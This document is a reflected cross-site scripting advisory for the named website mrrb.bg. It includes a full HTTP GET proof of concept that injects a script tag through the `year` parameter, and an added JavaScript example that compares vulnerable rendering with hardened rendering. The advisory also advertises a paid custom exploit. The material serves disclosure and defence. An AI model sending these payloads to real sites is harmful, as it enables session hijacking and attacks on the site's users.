Cross-Site Scripting (XSS) on `mrrb.bg` would involve an attacker injecting malicious client-side scripts, typically JavaScript, into web pages viewed by other users.
This vulnerability usually arises when a website, like `mrrb.bg`, fails to validate user-supplied input or to encode it for the context in which it is rendered back to the browser. For example, if a search bar, comment section, or URL parameter on `mrrb.bg` did not escape special characters, an attacker could submit a payload like `"><script>alert(1)</script>`.
When another user views the page containing this unescaped input, their browser executes the injected script. Potential impacts include session hijacking, defacing the website, redirecting users to attacker-controlled sites, or stealing sensitive information such as cookies (where those cookies are not marked HttpOnly).
To prevent XSS, websites must validate user-supplied input against its expected shape and, above all, apply context-aware output encoding wherever user-generated content is rendered; a Content-Security-Policy limits the damage when a reflection is missed. Without specific details or a publicly confirmed report, this remains a general explanation of how XSS *could* manifest on any website.
## Title: mrrb.bg-APP - XSS-Reflected
## Author: nu11secur1ty
## Date: 01/06/2026
## Vendor: mrrb.bg
## Software: mrrb.bg
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Description:
The value of the `year` request parameter is copied into the value of an
HTML tag attribute which is encapsulated in double quotation marks. The
payload `fchd2"><script>alert(1)</script>a1mg2` was submitted in the `year`
parameter. This input was echoed unmodified in the application's response, so the `"` closes the attribute, the `>` closes the tag, and the `<script>` element that follows is parsed as markup and executed. The PoC below is a plain top-level GET (`Sec-Fetch-Mode: navigate`), so delivery only requires the victim to open the link; before rating it, confirm that the response is served as `text/html` and that no Content-Security-Policy blocks inline script.
STATUS: HIGH - Vulnerability
[+]PoC:
```
GET /en/reload-calendar/?month=12&year=2025fchd2%22%3e%3cscript%3ealert(1)%3c%2fscript%3ea1mg2 HTTP/2
Host: www.mrrb.bg
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="143", "Not;A=Brand";v="24", "Google Chrome";v="143"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html, */*; q=0.01
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: GeneralAppGenSession=jqlrr36bq8q2d2ucrpm9o49g25; _ga=GA1.2.1383633579.1767642035; _gid=GA1.2.449285359.1767642035; _gat=1; _ga_S2X8R0459V=GS2.2.s1767642035$o1$g1$t1767642039$j56$l0$h0
X-Requested-With: XMLHttpRequest
Referer: https://www.mrrb.bg/en/
```
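The following is an added example, not code from mrrb.bg or from the advisory author. It shows what the server sees once the `year` value from the PoC request above is URL-decoded, why concatenating it into a double-quoted attribute lets the `"` and `>` break out of the tag, and what a hardened handler looks like (validate the value against its expected shape, then encode it for the attribute context anyway). The HTML fragment, the handler names and the accepted year range are assumptions; the URL and the payload are taken from the PoC.

```javascript
// Added example (not code from mrrb.bg or the advisory author): reflected XSS
// via a `year` parameter copied into a double-quoted attribute, vulnerable
// rendering beside the hardened version. The HTML fragment, handler names and
// year range are assumptions; URL and payload come from the advisory's PoC.

// Constructed from the PoC request line (Host header + path).
const POC_URL =
  'https://www.mrrb.bg/en/reload-calendar/?month=12&year=2025fchd2%22%3e%3cscript%3ealert(1)%3c%2fscript%3ea1mg2';

// What the server sees after URL-decoding the query string.
function yearParam(url) {
  return new URL(url).searchParams.get('year');
}

// Vulnerable pattern (assumed shape of the calendar fragment): the raw value
// is concatenated into a double-quoted attribute. A `"` in the value closes
// the attribute, `>` closes the tag, and everything after is parsed as markup.
function renderVulnerable(month, year) {
  return `<div class="calendar" data-month="${month}" data-year="${year}"></div>`;
}

// Hardened handler: reject anything that is not a plausible month/year, then
// encode for the attribute context anyway. Validation keeps junk out of the
// application; the encoder is what stops XSS if validation is ever loosened.
function parseMonth(raw) {
  if (typeof raw !== 'string' || !/^\d{1,2}$/.test(raw)) return null;
  const m = Number(raw);
  return m >= 1 && m <= 12 ? m : null;
}

function parseYear(raw) {
  if (typeof raw !== 'string' || !/^\d{4}$/.test(raw)) return null;
  const y = Number(raw);
  return y >= 1900 && y <= 2100 ? y : null; // assumed calendar range
}

// Minimal HTML attribute encoder: every character that can terminate a
// double- or single-quoted attribute or start a tag becomes an entity.
function encodeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(monthRaw, yearRaw) {
  const month = parseMonth(monthRaw);
  const year = parseYear(yearRaw);
  if (month === null || year === null) {
    return { status: 400, body: 'invalid month or year' };
  }
  const body = `<div class="calendar" data-month="${encodeAttr(month)}" data-year="${encodeAttr(year)}"></div>`;
  return { status: 200, body };
}

// Scanner-style check, the same thing the advisory's scanner did: is the probe
// present in the response with its quote and angle brackets intact?
function breaksOutOfAttribute(html) {
  return html.includes('"><script>alert(1)</script>');
}

// Stand-alone demo: decode the PoC value and run it through both handlers.
const probe = yearParam(POC_URL);
console.log('decoded year param:', probe);
console.log('vulnerable reflects script tag:', breaksOutOfAttribute(renderVulnerable('12', probe)));
const hardened = renderHardened('12', probe);
console.log('hardened status:', hardened.status, '| reflects script tag:', breaksOutOfAttribute(hardened.body));
```

Run it with `node` and the first line prints the decoded value `2025fchd2"><script>alert(1)</script>a1mg2`, which is exactly what the description says was echoed back. Note that even if `parseYear` were removed, `encodeAttr` alone would keep the probe inside the attribute, which is why the encoder, not the validator, is the control that matters for XSS.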
[+]Custom PoC - Exploit:
```
170 Euro
```
## Link:
[href](https://venvar.gumroad.com/l/fpfywm)
## Demo PoC:
[href](https://www.patreon.com/posts/mrrb-bg-xss-147550429)
## Time spent:
04:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://nu11secur1ty.blogspot.com/>
mrrb.bg Cross Site Scripting
- Written by: khalil shreateh
- Category: Vulnerabilities